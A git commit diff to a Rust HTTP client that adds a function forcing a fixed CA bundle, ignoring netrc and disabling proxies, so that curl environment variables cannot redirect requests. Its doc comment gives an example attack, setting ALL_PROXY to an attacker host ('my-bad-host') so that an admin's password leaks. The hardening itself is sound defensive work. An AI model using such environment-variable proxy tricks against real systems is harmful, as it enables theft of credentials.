security: override CURL env parameters

This commit is contained in:
2026-05-11 03:02:02 +02:00
parent 875fb215bf
commit b660956c4f
+16
View File
@@ -49,6 +49,21 @@ pub struct Response {
} }
impl Client { impl Client {
/// Adds defalt options that can be env overriden in untrsuted environments to leak information.
///
/// E.g. `ALL_PROXY=http://my-bad-host/ passwd` leaks admins password without this.
///
/// Check:
/// - <https://curl.se/libcurl/c/libcurl-env.html>
pub fn add_security_overrides(easy: &mut Easy) -> Result<(), curl::Error> {
easy.cainfo("/etc/ssl/certs/ca-bundle.crt")?;
easy.netrc(curl::easy::NetRc::Ignored)?;
// <https://docs.rs/curl/latest/curl/easy/struct.Easy2.html#method.noproxy>
easy.noproxy("*")?;
Ok(())
}
pub fn add_headers(easy: &mut Easy, headers: &[&str]) -> Result<(), curl::Error> { pub fn add_headers(easy: &mut Easy, headers: &[&str]) -> Result<(), curl::Error> {
let mut curl_headers = List::new(); let mut curl_headers = List::new();
@@ -121,6 +136,7 @@ impl Client {
let mut easy = Easy::new(); let mut easy = Easy::new();
let client = &mut easy; let client = &mut easy;
Self::add_security_overrides(client)?;
Self::add_headers(client, headers)?; Self::add_headers(client, headers)?;
client.url(uri)?; client.url(uri)?;
Self::set_method_and_body(client, method)?; Self::set_method_and_body(client, method)?;